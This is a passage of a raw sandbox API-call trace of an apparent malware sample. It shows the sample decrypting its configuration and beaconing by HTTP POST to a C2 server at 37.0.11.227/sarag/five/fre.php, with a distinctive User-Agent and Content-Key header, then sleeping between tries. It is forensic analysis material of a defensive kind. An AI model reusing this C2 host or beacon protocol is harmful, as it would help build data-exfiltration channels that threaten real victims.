(HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0286.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.297] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0286.302] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.302] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0286.314] GetProcessHeap () returned 0x690000 [0286.314] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0286.315] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.315] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0286.316] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.317] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0286.317] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.318] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0286.318] GetProcessHeap () returned 0x690000 [0286.318] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0286.319] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.320] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0286.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.321] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0286.321] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.322] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0286.322] GetProcessHeap () returned 0x690000 [0286.322] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0286.323] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.323] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0286.324] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.324] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0286.325] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.325] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0286.326] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.326] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0286.326] GetProcessHeap () returned 0x690000 [0286.326] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0286.327] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0286.327] GetProcessHeap () returned 0x690000 [0286.327] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0286.327] socket (af=2, type=1, protocol=6) returned 0x924 [0286.327] connect (s=0x924, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0286.350] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0286.350] GetProcessHeap () returned 0x690000 [0286.350] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0286.350] GetProcessHeap () returned 0x690000 [0286.350] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0286.351] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0286.353] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0286.353] GetProcessHeap () returned 0x690000 [0286.353] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6aff80 [0286.353] GetProcessHeap () returned 0x690000 [0286.354] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0286.354] GetProcessHeap () returned 0x690000 [0286.354] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4460 [0286.354] GetProcessHeap () returned 0x690000 [0286.354] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0286.355] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0286.356] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0286.356] GetProcessHeap () returned 0x690000 [0286.356] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0286.356] GetProcessHeap () returned 0x690000 [0286.356] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0286.357] send (s=0x924, buf=0x6ad508*, len=242, flags=0) returned 242 [0286.357] send (s=0x924, buf=0x6aba40*, len=159, flags=0) returned 159 [0286.357] GetProcessHeap () returned 0x690000 [0286.357] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0286.357] recv (in: s=0x924, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0286.430] GetProcessHeap () returned 0x690000 [0286.431] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0286.431] GetProcessHeap () returned 0x690000 [0286.431] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0286.432] GetProcessHeap () returned 0x690000 [0286.432] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aff80 | out: hHeap=0x690000) returned 1 [0286.433] GetProcessHeap () returned 0x690000 [0286.433] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0286.433] closesocket (s=0x924) returned 0 [0286.434] GetProcessHeap () returned 0x690000 [0286.434] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0286.434] GetProcessHeap () returned 0x690000 [0286.434] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0286.434] GetProcessHeap () returned 0x690000 [0286.435] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0286.435] GetProcessHeap () returned 0x690000 [0286.435] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0286.435] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1760) returned 0x924 [0286.437] Sleep (dwMilliseconds=0xea60) [0286.438] GetProcessHeap () returned 0x690000 [0286.438] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0286.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.439] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0286.444] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.446] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0286.452] GetProcessHeap () returned 0x690000 [0286.452] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0286.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.454] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0286.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.455] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0286.456] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.457] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0286.457] GetProcessHeap () returned 0x690000 [0286.457] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0286.458] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.458] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0286.459] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.459] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0286.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.460] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0286.461] GetProcessHeap () returned 0x690000 [0286.461] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0286.461] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.462] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0286.462] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.463] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0286.463] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.464] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0286.468] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.469] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0286.469] GetProcessHeap () returned 0x690000 [0286.469] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0286.469] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0286.469] GetProcessHeap () returned 0x690000 [0286.469] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0286.469] GetProcessHeap () returned 0x690000 [0286.470] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0286.470] GetProcessHeap () returned 0x690000 [0286.470] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0286.470] GetProcessHeap () returned 0x690000 [0286.470] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0286.471] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.471] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0286.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.476] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0286.483] GetProcessHeap () returned 0x690000 [0286.483] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0286.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.484] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0286.485] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.485] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0286.486] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.486] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0286.486] GetProcessHeap () returned 0x690000 [0286.487] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0286.487] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.488] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0286.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.489] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0286.490] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.490] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0286.490] GetProcessHeap () returned 0x690000 [0286.490] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0286.491] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.491] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0286.492] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.492] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0286.493] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.493] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0286.494] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.494] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0286.494] GetProcessHeap () returned 0x690000 [0286.494] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0286.494] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0286.494] GetProcessHeap () returned 0x690000 [0286.494] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab460 [0286.494] socket (af=2, type=1, protocol=6) returned 0x928 [0286.495] connect (s=0x928, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0286.524] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0286.524] GetProcessHeap () returned 0x690000 [0286.524] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0286.524] GetProcessHeap () returned 0x690000 [0286.524] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0286.525] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0286.526] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0286.526] GetProcessHeap () returned 0x690000 [0286.526] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0286.526] GetProcessHeap () returned 0x690000 [0286.527] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0286.527] GetProcessHeap () returned 0x690000 [0286.527] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0286.527] GetProcessHeap () returned 0x690000 [0286.527] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0286.528] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0286.528] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0286.528] GetProcessHeap () returned 0x690000 [0286.528] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0286.529] GetProcessHeap () returned 0x690000 [0286.529] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0286.529] send (s=0x928, buf=0x6ad508*, len=242, flags=0) returned 242 [0286.529] send (s=0x928, buf=0x6aba40*, len=159, flags=0) returned 159 [0286.530] GetProcessHeap () returned 0x690000 [0286.530] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0286.530] recv (in: s=0x928, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0286.628] GetProcessHeap () returned 0x690000 [0286.628] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0286.628] GetProcessHeap () returned 0x690000 [0286.629] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0286.629] GetProcessHeap () returned 0x690000 [0286.629] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0286.629] GetProcessHeap () returned 0x690000 [0286.630] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0286.630] closesocket (s=0x928) returned 0 [0286.630] GetProcessHeap () returned 0x690000 [0286.630] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab460 | out: hHeap=0x690000) returned 1 [0286.630] GetProcessHeap () returned 0x690000 [0286.631] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0286.631] GetProcessHeap () returned 0x690000 [0286.631] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0286.631] GetProcessHeap () returned 0x690000 [0286.632] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0286.685] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1764) returned 0x928 [0286.687] Sleep (dwMilliseconds=0xea60) [0286.697] GetProcessHeap () returned 0x690000 [0286.697] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0286.698] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.698] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0286.705] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.705] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0286.713] GetProcessHeap () returned 0x690000 [0286.713] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0286.714] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.714] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0286.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.715] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0286.716] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.716] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0286.716] GetProcessHeap () returned 0x690000 [0286.716] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0286.717] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.717] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0286.718] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.748] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0286.748] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.749] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0286.749] GetProcessHeap () returned 0x690000 [0286.749] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0286.749] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.750] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0286.750] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.751] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0286.752] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.752] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0286.753] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.753] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0286.753] GetProcessHeap () returned 0x690000 [0286.753] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0286.753] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0286.754] GetProcessHeap () returned 0x690000 [0286.754] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0286.754] GetProcessHeap () returned 0x690000 [0286.754] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0286.757] GetProcessHeap () returned 0x690000 [0286.757] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0286.758] GetProcessHeap () returned 0x690000 [0286.758] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0286.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.759] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0286.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.764] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0286.772] GetProcessHeap () returned 0x690000 [0286.772] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0286.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.773] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0286.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.774] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0286.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.775] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 